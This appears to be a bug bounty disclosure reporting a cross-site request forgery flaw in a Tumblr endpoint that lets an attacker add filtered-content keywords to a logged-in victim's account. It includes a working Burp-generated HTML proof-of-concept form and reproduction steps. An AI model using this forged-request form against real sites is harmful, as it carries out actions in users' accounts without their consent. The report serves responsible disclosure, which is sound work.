[tumblr.com] CSRF in /svc/user/filtered_content

## Summary: Hello, I have found a Cross-site request forgery in ``https://tumblr.com/svc/user/filtered_content``` allow an attacker to add filtered content to a target/victim account. The custom HTTP Header ```X-tumblr-form-key ``` used for the protection CSRF is not validate. ## Steps To Reproduce: 1) Logging into your Tumblr account in your current navigator . 2) Open the poc.html or manually copy this following code in an html file and open this in your current navigator and click to ```Submit request```. ```html <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://www.tumblr.com/svc/user/filtered_content" method="POST"> <input type="hidden" name="filtered&#95;content" value="pwd777" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` 3) Go to https://www.tumblr.com/settings/account and you will see the keyword ```pwd777``` in your filtered content . /!\ You can't add a same filtered content this will generate a 400 HTTP Response code /!\ You can follow me in the video POC. Thanks, good bye. ## Impact Allow a attacker add filtered content to a target/victim account.